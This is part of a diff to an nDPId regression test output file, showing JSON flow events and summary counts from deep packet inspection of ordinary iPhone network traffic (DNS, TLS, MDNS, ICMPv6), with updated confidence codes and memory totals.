+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454599396,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553606,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1926,"flow_avg_l4_payload_len":481,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454556158,"flow_last_seen":1582454586170,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454596364,"flow_last_seen":1582454597360,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595354,"flow_last_seen":1582454599568,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553606,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1926,"flow_avg_l4_payload_len":481,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454556158,"flow_last_seen":1582454586170,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} 
+00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454596364,"flow_last_seen":1582454597360,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595354,"flow_last_seen":1582454599568,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","packets-captured":500,"packets-processed":486,"total-skipped-flows":0,"total-l4-payload-len":190360,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":50,"total-detection-updates":40,"total-updates":0,"current-active-flows":0,"total-active-flows":51,"total-idle-flows":51,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":315,"global_ts_msec":1582454600748} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 500/486 @@ -321,9 +321,9 @@ ~~ total active/idle flows...: 51/51 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6194411 bytes -~~ total memory freed........: 6194411 bytes -~~ total allocations/frees...: 119032/119032 +~~ total memory allocated....: 6328045 bytes +~~ total memory freed........: 6328045 bytes +~~ total allocations/frees...: 121794/121794 